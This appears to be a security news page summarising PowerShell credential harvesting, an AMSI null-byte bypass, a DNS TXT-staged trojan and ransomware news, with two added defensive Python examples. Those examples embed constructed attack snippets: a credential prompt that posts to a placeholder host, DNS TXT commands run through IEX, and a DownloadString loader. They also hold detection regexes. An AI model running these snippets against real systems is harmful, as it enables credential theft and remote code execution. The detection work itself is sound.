A new PowerShell script was posted on GitHub recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server. This allows an attacker to distribute the script and harvest domain login credentials from their victims.
Malware that embeds a null character in its code can bypass security scans performed by the Anti-Malware Scan Interface (AMSI) on Windows 10 boxes.
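The null-byte bypass in the item above can be modelled in a few lines: one scanner that stops at the first NUL, which is what a scanner inherits when it treats its input as a C string (the mechanism assumed here for the reported bypass), beside one that scans the whole buffer it was handed, plus the cheap triage check a defender actually wants. This is an added illustration written for this page, not code from AMSI, Microsoft or the researchers who reported the issue; the signature list and the sample script are constructed.

```python
"""Illustration of a NUL-byte scan bypass: a scanner that stops at the first
null byte (the way a C-string consumer would) misses what follows it, while a
length-aware scanner does not. Added example for this page; not code from
AMSI or Microsoft. SIGNATURES and SAMPLE are constructed for the demo."""

# Constructed stand-in for an antimalware engine's signature list.
SIGNATURES = [
    b"Invoke-Mimikatz",
    b"IEX (New-Object Net.WebClient).DownloadString",
]


def scan_as_c_string(buf: bytes) -> bool:
    """Scanner that treats its input as NUL-terminated and so never sees bytes
    after the first NUL. Assumption: this models the reported bypass."""
    visible = buf.split(b"\x00", 1)[0]
    return any(sig in visible for sig in SIGNATURES)


def scan_full_length(buf: bytes) -> bool:
    """Length-aware scanner: every byte it was handed is examined."""
    return any(sig in buf for sig in SIGNATURES)


def has_embedded_nul(buf: bytes) -> bool:
    """Triage check: script source has no legitimate reason to contain a NUL,
    so its presence is itself worth alerting on regardless of signatures."""
    return b"\x00" in buf


# Constructed sample: harmless prefix, a NUL, then the part a NUL-terminated
# scanner never reaches. The URL is a placeholder, not a real host.
BENIGN_PREFIX = b"Write-Host 'updating inventory'\n"
PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\n"
SAMPLE = BENIGN_PREFIX + b"\x00" + PAYLOAD


if __name__ == "__main__":
    print("NUL-terminated scanner flags sample:", scan_as_c_string(SAMPLE))
    print("Length-aware scanner flags sample:  ", scan_full_length(SAMPLE))
    print("Sample contains embedded NUL:       ", has_embedded_nul(SAMPLE))
```

The practical point is the third function: whatever a given scanner does with the bytes after a NUL, a null byte inside PowerShell source is an indicator in its own right, and a script block logging rule that flags it needs no signature at all.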
Security researchers have spotted a booby-trapped PowerPoint file that will download malware to a computer whenever a victim hovers a link, no macro scripts required.
Malware researchers have come across a new Remote Access Trojan (RAT) that uses a novel technique to evade detection on corporate networks by fetching malicious PowerShell commands stored inside a domain's DNS TXT records.
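Both the credential-harvesting script in the first item and the DNS TXT staging in the item just above leave a recognisable shape in PowerShell script block logging (Event ID 4104), so one detector can cover both. The following is an added example written for this page, not code from any tool or malware mentioned in these items; the script blocks it is run over are constructed, and the regular expressions are assumed indicators of what these techniques look like in a log, not signatures from any product.

```python
"""Detection pass over PowerShell script block log text (what Event ID 4104
records). Added example for this page, not code from any tool or malware in
the items above. The sample blocks are constructed and the regexes are
assumed indicators, not a product's signatures."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Finding:
    technique: str
    line_no: int
    evidence: str


# Assumed indicators for the credential-harvesting script: a credential
# prompt, a validation call against the domain, and an outbound web request.
CRED_PROMPT = re.compile(r"Get-Credential|PromptForCredential", re.I)
CRED_VALIDATE = re.compile(r"ValidateCredentials\(|PrincipalContext", re.I)
WEB_OUT = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|UploadString|UploadValues", re.I
)

# Assumed indicators for DNS TXT staging: a TXT lookup in the same block as
# Invoke-Expression, which is what turns the record's text into code.
DNS_TXT = re.compile(r"Resolve-DnsName.*-Type\s+TXT|nslookup\s+-q(?:uery)?=txt", re.I)
IEX = re.compile(r"\bIEX\b|Invoke-Expression", re.I)


def _matching_lines(lines: list[str], pattern: re.Pattern[str]) -> list[int]:
    """1-based line numbers in `lines` that match `pattern`."""
    return [i for i, line in enumerate(lines, 1) if pattern.search(line)]


def analyze_script_block(text: str) -> list[Finding]:
    """Return findings for one logged script block. Each rule needs two
    indicators in the same block, which keeps a lone Get-Credential or a
    lone SPF lookup from alerting."""
    lines = text.splitlines()
    findings: list[Finding] = []

    prompt = _matching_lines(lines, CRED_PROMPT)
    sink = _matching_lines(lines, WEB_OUT) + _matching_lines(lines, CRED_VALIDATE)
    if prompt and sink:
        findings.append(
            Finding("credential-prompt-and-exfil", prompt[0], lines[prompt[0] - 1].strip())
        )

    txt = _matching_lines(lines, DNS_TXT)
    iex = _matching_lines(lines, IEX)
    if txt and iex:
        findings.append(
            Finding("dns-txt-command-staging", txt[0], lines[txt[0] - 1].strip())
        )
    return findings


# Constructed script blocks. Hosts use the reserved .invalid TLD.
HARVEST_BLOCK = """\
$cred = Get-Credential -Message 'Your session has expired, please sign in again'
$ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Domain')
if ($ctx.ValidateCredentials($cred.UserName, $cred.GetNetworkCredential().Password)) {
    Invoke-WebRequest -Uri 'http://example.invalid/collect' -Method Post -Body $cred.UserName
}
"""

DNS_STAGE_BLOCK = """\
$txt = (Resolve-DnsName -Name 'cmd.example.invalid' -Type TXT).Strings -join ''
IEX $txt
"""

BENIGN_CRED_BLOCK = """\
$cred = Get-Credential
New-PSDrive -Name Z -PSProvider FileSystem -Root '\\\\files.example.invalid\\share' -Credential $cred
"""

BENIGN_TXT_BLOCK = """\
# Routine SPF check
Resolve-DnsName -Name 'example.invalid' -Type TXT
"""


if __name__ == "__main__":
    samples = [("harvest", HARVEST_BLOCK), ("dns", DNS_STAGE_BLOCK),
               ("benign-cred", BENIGN_CRED_BLOCK), ("benign-txt", BENIGN_TXT_BLOCK)]
    for name, block in samples:
        print(name, [f.technique for f in analyze_script_block(block)])
```

Requiring two indicators in the same script block is the design choice worth copying: a help-desk script that calls Get-Credential to map a drive, or an admin checking an SPF record, should not page anyone, while a prompt paired with a web request or a TXT lookup paired with Invoke-Expression is rarely legitimate.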
Lots of small ransomware infections and screenlockers this week, but no major infections were discovered. Thankfully, security researchers were able to create a bunch of decryptors and make them available for victims to recover their files. Of particular note was the San Francisco MTA getting hit hard by the HDDCryptor ransomware.
Microsoft researchers Itai Grady and Tal Be'ery released today a new tool designed to help system administrators protect enterprise networks from reconnaissance attacks.
Today Microsoft has released the Windows 10 Insider Preview Build 14971 for PC to Insiders on the fast ring. This release adds the ability to read EPUB books in Microsoft Edge, includes the Paint 3D application, and makes PowerShell the default shell in File Explorer and the Win+X menu.
This week we have 3 new ransomware variants, 2 new ransomware infections, and 4 new ransomware decryptors. Stampado finally popped its head out of its hole, but was quickly squashed and a slew of new decryptors were released. Overall, a good week for the good guys.
It is bad enough when a ransomware infection encrypts your data and demands a ransom, but it's even worse when shoddy programming destroys it instead. This is what happened in a new variant of the Power Worm ransomware, where a programming mistake encrypts your data with AES and then discards the key, leaving no way to decrypt the files even if the ransom is paid.